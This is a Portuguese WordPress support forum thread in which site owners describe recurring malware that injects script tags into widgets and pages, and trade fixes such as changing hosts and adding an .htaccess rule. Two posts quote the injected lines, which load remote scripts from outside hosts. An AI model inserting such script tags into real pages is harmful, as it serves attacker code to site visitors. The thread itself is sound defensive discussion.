Suporte » Ajustando o WordPress » malware wordpress

  • Resolvido paulohpf

    (@paulohpf)


    Ola,
    Estou com um problema no meu site q ele aparece uns scripts desse tipo:

    <script type="text/javascript" src="http://asaunirg.com.br/js/0day.php"></script>

    Ja atualizei a pagina e procurei por arquivos modificados mais eu não consigo encontrar o virus!!
    ele fica adicionando o codigo nos widgets e se deixar adiciona no cogigo da pagina…
    estou desesperado porque se eu tiver que reinstalar a pagina vou ter trabalho com os plugins e posts…
    alguem ai da uma luz pelamordeDeus!!

    a pagina eh http://www.betel-bauru.com.br

    Abraço

Visualizando 6 respostas - 31 até 36 (de um total de 36)
  • Eae pessoal, tudo bem?

    Acompanhei os comentários anteriores e percebi que todos chegam a deduções parecidas com as minhas, porém até um momento uma causa perdida.

    Bom tenho o mesmo problema que Anderson e vi que faz 1 mês que ele deixo o ultimo recado. Alguma novidade?
    Estou no modo manual, toda vez que o maldito widget adiciona uma linha para uma pagina .exe no meu index vou lá e excluo ele e a linha no código.

    Ideias que estou trabalhando:
    • Pesquisando algum pluging que bloqueia a adição de linhas ou dos próprios widgets automaticamente.
    • Antivirus capaz de detectar o que acontece em meu WP.
    • Códigos que adiciono ao index que possa impedir ou desconsiderar isso.

    Mais ideias?

    Pois é cara, fiz muita coisa, inclusive instalei plugins que monitoram o servidor e se um arquivo é criado, modificado, apagado, o plugin avisa.

    Mas nem isto resolveu cara!

    Baixei o tema todo novamente e mudei de servidor e parece que resolveu. Nunca mais voltou a “pegar virus”.

    Pessoal, tenho o mesmo problema há vários meses.
    Sempre elimino os scripts e sempre voltam depois de + ou – 10 dias…

    Na maioria das vezes é criado um Widget com um código assim: <script src=”http://131.244.39.41/br/flashplayer”></script>

    O que muda é só o IP em cada ataque. Eu estava com esse problema em um site, só que ontem começou em outro site.

    O que resolveu foi com a instalação do WP-Sentinel, não tive mais problema com o SCRIPT, mas o WP-Sentinel sempre estava bloqueando o site então desinstalei.

    Já fiz diversas coisas como: Mudar de tema {Original pago}, apagar plugins suspeitos, reinstalar completamente o WordPress.
    Não sei mais o que fazer, estou pensando em mudar a pasta principal, exemplo: http://www.site.com.br/novo

    Percebo que aparentemente é uma invasão externa, penso que algum servidor {programado} faz esse injeção do código malicioso.

    Igual ocorria comigo.

    A única solução foi a de trocar de servidor.
    Antes ficava na locaweb. Agora está em server dedicado.

    tente dar uma olhada no .htaccess do seu site via FTP
    http://perishablepress.com/5g-blacklist-2013/

    esse site acima ele eh um script para .htaccess para bloquear a entrada de alguns sites…
    eu apliquei no meu site, as vezes ele pode funcionar…
    faça um teste.

    Pessoal,

    Esse tipo de ataque (code injection) geralmente é feito através de vulnerabilidades em plugins e temas. São centenas de milhares de plugins criados e distribuidos por qualquer um e fica praticamente impossível acompanhar todas as formas de proteger o seu site WordPress, certo?

    Bom, aqui vai um pequeno trecho de código que bloqueia o acesso direto a arquivos PHP dentro dos plugins e temas. Na prática, isso deveria ser prevenido pelo próprio plugin, usando funções que o WP disponibiliza para deixar o plugin mais seguro, mas, nem todos fazem.

    Atenção, o código abaixo pode fazer com que algum plugin tenha alguma função bloqueada, caso ele utilize acesso direto aos arquivos PHP pelo usuário. Ao identificar algo assim, substitua o plugin por outro com a mesma funcionalidade.

    O código abaixo deve ser colocado num arquivo .htaccess dentro da pasta wp-content:

    ## REMOVE ACCESS TO NO-ASSETS FILES
    order deny,allow
    deny from all
    <files ~ ".(xml|css|jpe?g|png|gif|js)$">
    allow from all
    </files>

    Caso tenham interesse, eu ofereço pacotes de limpeza e segurança para WordPress. Basta entrar em contato [at] tecnocracia.net.

Visualizando 6 respostas - 31 até 36 (de um total de 36)
  • O tópico ‘malware wordpress’ está fechado para novas respostas.